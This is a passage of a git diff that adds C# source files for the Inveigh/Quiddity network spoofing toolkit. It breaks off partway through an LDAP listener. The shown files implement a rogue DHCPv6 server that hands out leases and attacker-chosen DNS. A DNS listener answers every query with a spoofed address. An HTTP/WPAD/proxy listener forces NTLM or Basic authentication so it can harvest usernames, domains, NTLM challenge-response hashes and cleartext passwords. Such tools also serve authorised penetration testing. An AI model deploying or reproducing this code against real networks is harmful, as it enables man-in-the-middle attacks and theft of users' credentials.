this.Client.ReceiveTimeout = 60000; + this.ExclusiveAddressUse = false; + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/DHCPv6Listener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/DHCPv6Listener.cs new file mode 100644 index 0000000..8d7b90e --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/DHCPv6Listener.cs @@ -0,0 +1,184 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.DHCPv6; +using System; +using System.Collections.Generic; +using System.Linq; +using System.Net; +using System.Net.Sockets; +using System.Text; + +namespace Quiddity +{ + public class DHCPv6Listener + { + public string DNSSuffix { get; set; } + public uint Lifetime { get; set; } + public int Prefix { get; set; } + public int Index { get; set; } + + public DHCPv6Listener() + { + this.Index = 1; + this.DNSSuffix = ""; + this.Lifetime = 300; + this.Prefix = (new Random()).Next(1, 9999); + } + + public DHCPv6Listener(uint lifetime, string dnsSuffix) + { + this.Index = 1; + this.DNSSuffix = dnsSuffix; + this.Lifetime = lifetime; + this.Prefix = (new Random()).Next(1, 9999); + } + + public void Start(IPAddress ipAddress, string mac, string dnsIPv6) + { + UDPListener listener = new UDPListener(AddressFamily.InterNetworkV6); + IPEndPoint ipEndPoint = new IPEndPoint(ipAddress, 547); + listener.JoinMulticastGroup(IPAddress.Parse("ff02::1:2")); + listener.Client.Bind(ipEndPoint); + + while (true) + { + + try + { + byte[] receiveBuffer = listener.Receive(ref ipEndPoint); + ProcessRequest(receiveBuffer, listener, ipEndPoint, mac, dnsIPv6); + } + catch (Exception ex) + { + Console.WriteLine(ex); + } + + } + + } + + protected virtual void ProcessRequest(byte[] data, UDPListener udpListener, IPEndPoint ipEndPoint, string listenerMAC, string dnsIPv6) + { + string clientIP = ipEndPoint.Address.ToString(); + DHCPv6Packet packet = new DHCPv6Packet(data); + + if (packet.Message?.MsgType == 1 || packet.Message?.MsgType == 3 || packet.Message?.MsgType == 5) + { + bool isMicrosoft = false; + + if (packet.Option16?.EnterpriseNumber == 311) + { + isMicrosoft = true; + } + + byte msgType = 0; + string leaseIP = ""; + + switch (packet.Message.MsgType) + { + case 1: + msgType = 2; + + break; + + case 3: + { + byte[] renewIP = new DHCPv6Option5(packet.Option3.IANAOptions).IPv6Address; + leaseIP = new IPAddress(renewIP).ToString(); + msgType = 7; + } + break; + + case 5: + { + byte[] renewIP = new DHCPv6Option5(packet.Option3.IANAOptions).IPv6Address; + leaseIP = new IPAddress(renewIP).ToString(); + msgType = 7; + } + break; + } + + DHCPv6DUIDLL duid = new DHCPv6DUIDLL(packet.Option1.DUID); + byte[] clientMACData = new DHCPv6DUIDLL(packet.Option1.DUID).LinkLayerAddress; + + if (duid.DUIDType == 1) + { + clientMACData = new DHCPv6DUIDLLT(packet.Option1.DUID).LinkLayerAddress; + } + + string clientMAC = BitConverter.ToString(clientMACData).Replace("-", ":"); + string clientHostName = ""; + + if (!String.IsNullOrEmpty(packet.Option39?.DomainName)) + { + clientHostName = packet.Option39.DomainName; + } + + if (Check(clientMAC, clientHostName, listenerMAC, isMicrosoft, out string message)) + { + + if (msgType == 2) + { + leaseIP = "fe80::" + this.Prefix + ":" + this.Index; + this.Index++; + } + + byte[] buffer = new DHCPv6Packet().GetBytes(msgType, leaseIP, listenerMAC, dnsIPv6, this.DNSSuffix, this.Lifetime, packet); + SendTo(buffer, udpListener, ipEndPoint); + } + + Output(packet.Message.MsgType, leaseIP, clientIP, clientMAC, clientHostName, message); + } + + } + + public virtual bool Check(string clientMAC, string clientHostName, string listenerMAC, bool isMicrosoft, out string message) + { + message = "response sent"; + return true; + } + + protected virtual void SendTo(byte[] data, UDPListener udpListener, IPEndPoint ipEndPoint) + { + udpListener.Client.SendTo(data, ipEndPoint); + } + + protected virtual void Output(int msgType, string leaseIP, string clientIP, string clientMAC, string clientHostName, string message) + { + } + + protected virtual void OutputError(string message) + { + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/DNSListener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/DNSListener.cs new file mode 100644 index 0000000..efdd8bd --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/DNSListener.cs @@ -0,0 +1,168 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.DNS; +using System; +using System.IO; +using System.Net; +using System.Net.Sockets; + +namespace Quiddity +{ + public class DNSListener + { + public uint Serial { get; set; } + public uint TTL { get; set; } + public string Host { get; set; } + public ushort Priority { get; set; } + public ushort Weight { get; set; } + + public DNSListener() + { + this.TTL = 30; + } + + public DNSListener(uint ttl) + { + this.TTL = ttl; + } + + public DNSListener(uint ttl, string host) + { + this.TTL = ttl; + this.Host = host; + this.Priority = 0; + this.Weight = 100; + } + + public void Start(IPAddress ipAddress, string replyIP, string replyIPv6) + { + UDPListener listener = new UDPListener(AddressFamily.InterNetwork); + IPEndPoint ipEndPoint = new IPEndPoint(ipAddress, 53); + + if (String.Equals(ipAddress.AddressFamily.ToString(), "InterNetworkV6")) + { + listener = new UDPListener(AddressFamily.InterNetworkV6); + } + + listener.Client.Bind(ipEndPoint); + + while (true) + { + + try + { + byte[] receiveBuffer = listener.Receive(ref ipEndPoint); + ProcessRequest(receiveBuffer, listener, ipEndPoint, replyIP, replyIPv6); + } + catch (Exception ex) + { + OutputError(ex); + } + + } + + } + + protected virtual void ProcessRequest(byte[] data, UDPListener udpListener, IPEndPoint ipEndPoint, string replyIP, string replyIPv6) + { + string clientIP = ipEndPoint.Address.ToString(); + DNSPacket packet = new DNSPacket(data) + { + Host = this.Host, + TTL = this.TTL + }; + + if (packet.Header.IsQuery()) + { + + if (!packet.Header.IsDynamicUpdateRequest()) + { + + if (Check(packet.Question.Name, packet.Question.Type, clientIP, out string message)) + { + byte[] buffer; + buffer = packet.GetBytes(this.TTL, this.Serial, replyIP, replyIPv6); + SendTo(buffer, udpListener, ipEndPoint); + } + + Output("DNS", clientIP, packet.Question.Name, packet.Question.Type, message); + } + else + { + byte[] flags = new byte[2] { 0xa8, 0x05 }; + byte[] dnsPayload = new byte[data.Length - 2]; + System.Buffer.BlockCopy(data, 2, dnsPayload, 0, dnsPayload.Length); + MemoryStream dnsMemoryStream = new MemoryStream(); + dnsMemoryStream.Write(data, 0, data.Length); + dnsMemoryStream.Position = 2; + dnsMemoryStream.Write(flags, 0, 2); + SendTo(dnsMemoryStream.ToArray(), udpListener, ipEndPoint); + + } + + } + + } + + public virtual bool Check(string name, string type, string clientIP, out string message) + { + message = "response sent"; + return true; + } + + public virtual bool Check(string name, string question, string type, string clientIP, out string message) + { + message = "response sent"; + return true; + } + + protected virtual void SendTo(byte[] data, UDPListener udpListener, IPEndPoint ipEndPoint) + { + udpListener.Client.SendTo(data, ipEndPoint); + } + + protected virtual void Output(string protocol, string clientIP, string name, string type, string message) + { + + } + + protected virtual void Output(string protocol, string clientIP, string name, string question, string type, string message) + { + + } + + protected virtual void OutputError(Exception ex) + { + + } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/HTTPListener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/HTTPListener.cs new file mode 100644 index 0000000..f31e8e4 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/HTTPListener.cs @@ -0,0 +1,540 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.HTTP; +using Quiddity.NTLM; +using System; +using System.Net; +using System.Net.Sockets; +using System.Text; +using System.Threading; +using System.Security.Cryptography.X509Certificates; +using System.Security.Authentication; +using System.Net.Security; +using Quiddity.Support; +using System.Collections; + +namespace Quiddity +{ + class HTTPListener + { + public bool EnabledWebDAV { get; set; } + public string Cert { get; set; } + public string CertPassword { get; set; } + public string[] IgnoreAgents { get; set; } + public string HTTPAuth { get; set; } + public string WebDAVAuth { get; set; } + public string WPADAuth { get; set; } + public string HTTPRealm { get; set; } + public string HTTPResponse { get; set; } + public string WPADResponse { get; set; } + public string Challenge { get; set; } + public string NetbiosDomain { get; set; } + public string ComputerName { get; set; } + public string DNSDomain { get; set; } + + public static bool isRunning = false; + public const SslProtocols tls12 = (SslProtocols)0x00000C00; + public static Hashtable httpSessionTable = Hashtable.Synchronized(new Hashtable()); + + public HTTPListener() + { + this.EnabledWebDAV = true; + this.IgnoreAgents = new string[] {"Firefox"}; + this.HTTPAuth = "NTLM"; + this.WebDAVAuth = "NTLM"; + this.WPADAuth = "NTLM"; + this.HTTPRealm = "temp"; + this.NetbiosDomain = "temp"; + this.ComputerName = "temp"; + this.DNSDomain = "temp"; + } + + internal void Start(IPAddress ipAddress, int port, string type) + { + TCPListener tcpListener = new TCPListener(ipAddress, port); + IAsyncResult tcpAsync; + + try + { + tcpListener.Start(); + isRunning = true; + + if (type.Equals("Proxy")) + { + tcpListener.Server.LingerState = new LingerOption(true, 0); + } + + if (tcpListener.Server.IsBound) + { + + while (isRunning) + { + + try + { + tcpAsync = tcpListener.BeginAcceptTcpClient(null, null); + + do + { + Thread.Sleep(10); + + if (!isRunning) + { + break; + } + + } + while (!tcpAsync.IsCompleted); + + TcpClient tcpClient = tcpListener.EndAcceptTcpClient(tcpAsync); + object[] parameters = { tcpClient, type, port }; + ThreadPool.QueueUserWorkItem(new WaitCallback(ReceiveClient), parameters); + } + catch (Exception ex) + { + OutputError(ex, type, port); + } + + } + + } + + } + catch (Exception ex) + { + OutputError(ex, type, port); + } + + } + + internal void ReceiveClient(object parameters) + { + object[] parameterArray = parameters as object[]; + TcpClient tcpClient = (TcpClient)parameterArray[0]; + string type = (string)parameterArray[1]; + int port = (int)parameterArray[2]; + + try + { + string[] supportedMethods = { "GET", "HEAD", "OPTIONS", "CONNECT", "POST", "PROPFIND" }; + string sourceIP = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Address.ToString(); + string sourcePort = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Port.ToString(); + string listenerPort = ((IPEndPoint)(tcpClient.Client.LocalEndPoint)).Port.ToString(); + string session = sourceIP + ":" + sourcePort; + string ntlmChallenge = ""; + int ntlmStage = 0; + bool proxyIgnoreMatch = false; + bool wpadAuthIgnoreMatch = false; + NetworkStream tcpStream = null; + NetworkStream httpStream = null; + SslStream httpsStream = null; + X509Certificate2 certificate = null; + bool isClientClose = false; + + if (type.Equals("HTTPS")) + { + byte[] certificateData = Convert.FromBase64String(Cert); + certificate = new X509Certificate2(certificateData, CertPassword, X509KeyStorageFlags.MachineKeySet); + tcpStream = tcpClient.GetStream(); + httpsStream = new SslStream(tcpStream, false); + } + else + { + httpStream = tcpClient.GetStream(); + } + + while (tcpClient.Connected && isRunning) + { + byte[] requestData = new byte[4096]; + + if (type.Equals("HTTPS")) + { + + do + { + Thread.Sleep(100); + } + while (!tcpStream.DataAvailable && tcpClient.Connected); + + } + else + { + + do + { + Thread.Sleep(100); // todo check + } + while (!httpStream.DataAvailable && tcpClient.Connected); + + } + + if (String.Equals(type, "HTTPS")) + { + + try + { + + if (!httpsStream.IsAuthenticated) + { + httpsStream.AuthenticateAsServer(certificate, false, tls12, false); + } + + while (tcpStream.DataAvailable) + { + httpsStream.Read(requestData, 0, requestData.Length); + } + + } + catch (Exception ex) + { + + if (!ex.Message.Contains("A call to SSPI failed, see inner exception.")) // todo check + { + Console.WriteLine(ex.Message); + } + + } + + } + else + { + + while (httpStream.DataAvailable) + { + httpStream.Read(requestData, 0, requestData.Length); + } + + } + + HTTPRequest request = new HTTPRequest(); + + if (!Utilities.ArrayIsNullOrEmpty(requestData)) + { + request.ReadBytes(requestData, 0); + } + + if (!string.IsNullOrEmpty(request.Method)) + { + OutputRequestMethod(type, listenerPort, sourceIP, sourcePort, request.URI, request.Method); + } + + if (!string.IsNullOrEmpty(request.URI)) + { + OutputHostHeader(type, listenerPort, sourceIP, sourcePort, request.Host); + } + + if (!string.IsNullOrEmpty(request.UserAgent)) + { + OutputUserAgent(type, listenerPort, sourceIP, sourcePort, request.UserAgent); + } + + if (!string.IsNullOrEmpty(request.Method) && Array.Exists(supportedMethods, element => element == request.Method)) + { + + HTTPResponse response = new HTTPResponse + { + Version = "HTTP/1.1", + StatusCode = "401", + ReasonPhrase = "Unauthorized", + Connection = "close", + Server = "Microsoft-HTTPAPI/2.0", + Date = DateTime.Now.ToString("R"), + ContentType = "text/html", + ContentLength = "0" + }; + + if (!Utilities.ArrayIsNullOrEmpty(IgnoreAgents) && WPADAuth.Equals("NTLM")) + { + + foreach (string agent in IgnoreAgents) + { + + if (request.UserAgent.ToUpper().Contains(agent.ToUpper())) + { + wpadAuthIgnoreMatch = true; + } + + } + + if (wpadAuthIgnoreMatch) + { + OutputIgnore(type, listenerPort, sourceIP, sourcePort, "switching wpad.dat auth to anonymous due to user agent match"); // todo make better + } + + } + + if (type.Equals("Proxy")) + { + response.StatusCode = "407"; + response.ProxyAuthenticate = "NTLM"; + response.WWWAuthenticate = ""; + response.Connection = "close"; + } + else if (EnabledWebDAV && request.Method.Equals("PROPFIND") && WebDAVAuth.StartsWith("NTLM")) + { + response.WWWAuthenticate = "NTLM"; + } + else if (EnabledWebDAV && request.Method.Equals("PROPFIND") && WebDAVAuth.Equals("BASIC")) + { + response.WWWAuthenticate = string.Concat("Basic realm=", HTTPRealm); + } + else if (!string.Equals(request.URI, "/wpad.dat") && string.Equals(HTTPAuth, "ANONYMOUS") || string.Equals(request.URI, "/wpad.dat") && string.Equals(WPADAuth, "ANONYMOUS") || wpadAuthIgnoreMatch || + (EnabledWebDAV && request.Method.Equals("OPTIONS"))) + { + response.StatusCode = "200"; + response.ReasonPhrase = "OK"; + } + else if ((HTTPAuth.StartsWith("NTLM") && !string.Equals(request.URI, "/wpad.dat")) || (WPADAuth.StartsWith("NTLM") && string.Equals(request.URI, "/wpad.dat"))) + { + response.WWWAuthenticate = "NTLM"; + } + else if ((string.Equals(HTTPAuth, "BASIC") && !string.Equals(request.URI, "/wpad.dat")) || (string.Equals(WPADAuth, "BASIC") && string.Equals(request.URI, "/wpad.dat"))) + { + response.WWWAuthenticate = string.Concat("Basic realm=", HTTPRealm); + } + + if ((!string.IsNullOrEmpty(request.Authorization) && request.Authorization.ToUpper().StartsWith("NTLM ")) || (!string.IsNullOrEmpty(request.ProxyAuthorization)) && request.ProxyAuthorization.ToUpper().StartsWith("NTLM ")) + { + string authorization = request.Authorization; + + if (!string.IsNullOrEmpty(request.ProxyAuthorization)) + { + authorization = request.ProxyAuthorization; + } + + NTLMNegotiate ntlm = new NTLMNegotiate(); + ntlm.ReadBytes(Convert.FromBase64String(authorization.Substring(5, authorization.Length - 5)), 0); + + if (ntlm.MessageType == 1) + { + byte[] timestamp = BitConverter.GetBytes(DateTime.Now.ToFileTime()); + NTLMChallenge challenge = new NTLMChallenge(Challenge, NetbiosDomain, ComputerName, DNSDomain, ComputerName, DNSDomain); + byte[] challengeData = challenge.GetBytes(ComputerName); + ntlmChallenge = BitConverter.ToString(challenge.ServerChallenge).Replace("-", ""); + string sessionTimestamp = BitConverter.ToString(timestamp).Replace("-", ""); + httpSessionTable[sessionTimestamp] = ntlmChallenge; + OutputChallenge(type, listenerPort, sourceIP, sourcePort, ntlmChallenge); + + if (String.Equals(type, "Proxy")) + { + response.StatusCode = "407"; + response.ProxyAuthenticate = "NTLM " + Convert.ToBase64String(challengeData); + } + else + { + response.WWWAuthenticate = "NTLM " + Convert.ToBase64String(challengeData); + } + + response.Connection = ""; + } + else if (ntlm.MessageType == 3) + { + response.StatusCode = "200"; + response.ReasonPhrase = "OK"; + ntlmStage = 3; + isClientClose = true; + NTLMResponse ntlmResponse = new NTLMResponse(Convert.FromBase64String(authorization.Substring(5, authorization.Length - 5)), false); + string domain = Encoding.Unicode.GetString(ntlmResponse.DomainName); + string user = Encoding.Unicode.GetString(ntlmResponse.UserName); + string host = Encoding.Unicode.GetString(ntlmResponse.Workstation); + string ntlmResponseHash = BitConverter.ToString(ntlmResponse.NtChallengeResponse).Replace("-", ""); + string lmResponseHash = BitConverter.ToString(ntlmResponse.LmChallengeResponse).Replace("-", ""); + + if (string.IsNullOrEmpty(ntlmChallenge)) // NTLMv2 workaround to track sessions over different ports without a cookie + { + + try + { + byte[] timestamp = new byte[8]; + Buffer.BlockCopy(ntlmResponse.NtChallengeResponse, 24, timestamp, 0, 8); + string sessionTimestamp = BitConverter.ToString(timestamp).Replace("-", ""); + ntlmChallenge = httpSessionTable[sessionTimestamp].ToString(); + } + catch + { + ntlmChallenge = ""; + } + + } + + OutputNTLM(type, listenerPort, sourceIP, sourcePort, user, domain, host, ntlmChallenge, ntlmResponseHash, lmResponseHash); + + if (type.Equals("Proxy")) + { + + if (!string.IsNullOrEmpty(HTTPResponse)) + { + response.CacheControl = "no-cache, no-store"; + } + + } + + } + + } + else if (!string.IsNullOrEmpty(request.Authorization) && request.Authorization.ToUpper().StartsWith("BASIC ")) + { + response.StatusCode = "200"; + response.ReasonPhrase = "OK"; + string httpHeaderAuthorizationBase64 = request.Authorization.Substring(6, request.Authorization.Length - 6); + string cleartextCredentials = Encoding.UTF8.GetString(Convert.FromBase64String(httpHeaderAuthorizationBase64)); + OutputCleartext(type, listenerPort, sourceIP, sourcePort, cleartextCredentials); + } + + if (!string.IsNullOrEmpty(WPADResponse) && !proxyIgnoreMatch && string.Equals(request.URI, "/wpad.dat")) + { + response.ContentType = "application/x-ns-proxy-autoconfig"; + response.Message = Encoding.UTF8.GetBytes(WPADResponse); + } + else if (!string.IsNullOrEmpty(HTTPResponse)) + { + response.Message = Encoding.UTF8.GetBytes(HTTPResponse); + } + + if (EnabledWebDAV) + { + + if (request.Method.Equals("OPTIONS")) + { + response.StatusCode = "200"; + response.ReasonPhrase = "OK"; + response.Allow = "OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, LOCK, UNLOCK"; + response.Public = "OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK"; + response.DAV = "1,2,3"; + response.Author = "DAV"; + } + else if (request.Method.Equals("PROPFIND")) + { + DateTime currentTime = DateTime.Now; + response.Message = Encoding.UTF8.GetBytes("\r\nNot Authorized\r\n\r\n

Not Authorized

\r\n

HTTP Error 401. The requested resource requires user authentication.

\r\n\r\n"); + response.Connection = ""; + + if (ntlmStage == 3 || (!string.IsNullOrEmpty(request.Authorization) && request.Authorization.ToUpper().StartsWith("BASIC ")) || HTTPAuth.Equals("ANONYMOUS")) + { + response.Connection = "close"; + + if (!request.URI.Contains(".")) + { + response.ContentType = "text/xml"; + response.Message = Encoding.UTF8.GetBytes("http://" + sourceIP + request.URI + "HTTP/1.1 200 OK" + currentTime.ToString("R") + "0webdav01" + currentTime.ToString("yyyy-MM-ddThh:mm:ss.fffZ") + ""); + } + else + { + response.ContentType = "text/plain"; + } + + } + + } + + } + + byte[] buffer = response.GetBytes(); + + if (type.Equals("HTTPS") && httpsStream.CanRead) + { + httpsStream.Write(buffer, 0, buffer.Length); + httpsStream.Flush(); + } + else if (httpStream.CanRead) + { + httpStream.Write(buffer, 0, buffer.Length); + httpStream.Flush(); + } + + if (isClientClose) + { + + if (type.Equals("Proxy")) + { + tcpClient.Client.Close(); + } + else + { + tcpClient.Close(); + } + + } + + } + + } + + } + catch (Exception ex) + { + OutputError(ex, type, port); + } + + } + + protected virtual void OutputUserAgent(string protocol, string listenerPort, string clientIP, string clientPort, string userAgent) + { + + } + + protected virtual void OutputChallenge(string protocol, string listenerPort, string clientIP, string clientPort, string challenge) + { + + } + + protected virtual void OutputHostHeader(string protocol, string listenerPort, string clientIP, string clientPort, string hostHeader) + { + + } + + protected virtual void OutputRequestMethod(string protocol, string listenerPort, string clientIP, string clientPort, string uri, string method) + { + + } + + protected virtual void OutputCleartext(string protocol, string listenerPort, string clientIP, string clientPort, string credentials) + { + + } + + protected virtual void OutputNTLM(string protocol, string listenerPort, string clientIP, string clientPort, string user, string domain, string host, string ntlmChallenge, string ntlmResponseHash, string lmResponseHash) + { + + } + + protected virtual void OutputIgnore(string protocol, string listenerPort, string clientIP, string clientPort, string message) + { + + } + protected virtual void OutputError(Exception ex, string protocol, int port) + { + + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/LDAPListener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/LDAPListener.cs new file mode 100644 index 0000000..8b6c27c --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/LDAPListener.cs @@ -0,0 +1,243 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.LDAP; +using Quiddity.NTLM; +using Quiddity.Support; +using System; +using System.Net; +using System.Net.Sockets; +using System.Text; +using System.Threading; + +namespace Quiddity +{ + class LDAPListener + { + + public string Challenge { get; set; } + public string NetbiosDomain { get; set; } + public string ComputerName { get; set; } + public string DNSDomain { get; set; } + + public static bool isRunning = false; + + internal void Start(IPAddress ipAddress, int port) + { + TCPListener tcpListener = new TCPListener(ipAddress, port); + IAsyncResult tcpAsync; + + try + { + tcpListener.Start(); + isRunning = true; + + if (tcpListener.Server.IsBound) + { + + while (isRunning) + { + + try + { + tcpAsync = tcpListener.BeginAcceptTcpClient(null, null); + + do + { + Thread.Sleep(10); + + if (!isRunning) + { + break; + } + + } + while (!tcpAsync.IsCompleted); + + TcpClient tcpClient = tcpListener.EndAcceptTcpClient(tcpAsync); + object[] parameters = { tcpClient, port }; + ThreadPool.QueueUserWorkItem(new WaitCallback(ReceiveClient), parameters); + } + catch (Exception ex) + { + OutputError(ex, port); + } + + } + + } + + } + catch (Exception ex) + { + OutputError(ex, port); + } + + } + + internal void ReceiveClient(object parameters) + { + object[] parameterArray = parameters as object[]; + TcpClient tcpClient = (TcpClient)parameterArray[0]; + int port = (int)parameterArray[1]; + NetworkStream tcpStream = tcpClient.GetStream(); + string ntlmChallenge = ""; + string clientIP = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Address.ToString(); + string clientPort = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Port.ToString(); + string listenerPort = ((IPEndPoint)(tcpClient.Client.LocalEndPoint)).Port.ToString(); + + try + { + + while (tcpClient.Connected && isRunning) + { + byte[] requestData = new byte[4096]; + + do + { + Thread.Sleep(100); + } + while (!tcpStream.DataAvailable && tcpClient.Connected); + + while (tcpStream.DataAvailable) + { + tcpStream.Read(requestData, 0, requestData.Length); + } + + LDAPMessage message = new LDAPMessage(); + message.Decode(requestData); + LDAPMessage message2 = new LDAPMessage(); + message2.MessageID = message.MessageID; + byte[] buffer = new byte[0]; + OutputConnection(listenerPort, clientIP, clientPort, message.Tag); + + if (message.Tag == 3) + { + LDAPMessage message3 = new LDAPMessage(); + message3.MessageID = message.MessageID; + LDAPSearchRequest searchRequest = new LDAPSearchRequest(); + searchRequest.ReadBytes((byte[][])message.ProtocolOp); + + LDAPSearchResDone resdone = new LDAPSearchResDone(); + resdone.ResultCode = 0; + LDAPSearchResEntry search = new LDAPSearchResEntry(); + + if (String.Equals(searchRequest.Attributes[0], "supportedCapabilities")) + { + LDAPSupportedCapabilities cap = new LDAPSupportedCapabilities(); + search.Attributes = cap.Encode(); + } + else if (String.Equals(searchRequest.Attributes[0], "supportedSASLMechanisms")) + { + LDAPSupportedSASLMechanisms mech = new LDAPSupportedSASLMechanisms(); + search.Attributes = mech.Encode(); + } + + message2.ProtocolOp = search; + message3.ProtocolOp = resdone; + buffer = Utilities.BlockCopy(message2.Encode(4), message3.Encode(5)); + } + else if (message.Tag == 0) + { 